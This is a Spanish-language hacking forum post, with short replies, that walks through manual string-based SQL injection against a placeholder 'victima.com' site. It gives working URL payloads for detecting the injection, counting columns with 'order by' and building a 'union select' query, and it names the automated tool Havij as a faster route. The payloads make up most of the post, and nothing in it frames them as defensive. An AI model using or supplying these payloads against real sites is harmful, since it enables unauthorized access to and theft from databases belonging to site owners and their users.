Supongamos que tenemos un sitio:
www.victima.com/index.php?ID=1'
Intentamos con el comando comun de
www.victima.com/index.php?ID=1+order+by+1--
No tenemos un error
Probamos con
www.victima.com/index.php?ID=1+order+by+10000--
No tenemos un error
Hay que hacer una string based injection
www.victima.com/index.php?ID=1'+order+by+1--+-
No tenemos error
Probamos con
www.victima.com/index.php?ID=1'+order+by+10--+-
TENEMOS ERROR!!
Entonces supongamos que probamos con
www.victima.com/index.php?ID=1'+order+by+9--+-
Y ahi no tenemos error o sea que son 9 columnas!
Entonces ahi seguimos como con una inyeccion normal
www.victima.com/index.php?ID=1'+union+select+1,2,3,4,5,6,7,8,9--+-
Bueno espero que les haya gustado!!
El método algo lento, pero para el que le gusta escribir bien. Sino use Havij! jejeje.
Saludos.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
El método algo lento, pero para el que le gusta escribir bien. Sino use Havij! jejeje.
Saludos.
Claro el Havij es para automatizar todo esto pero hay gente que le interesa mas las inyecciones manuales ya que quieren entender a fondo todo lo que estan haciendo en vez de que una herramienta se lo haga por el.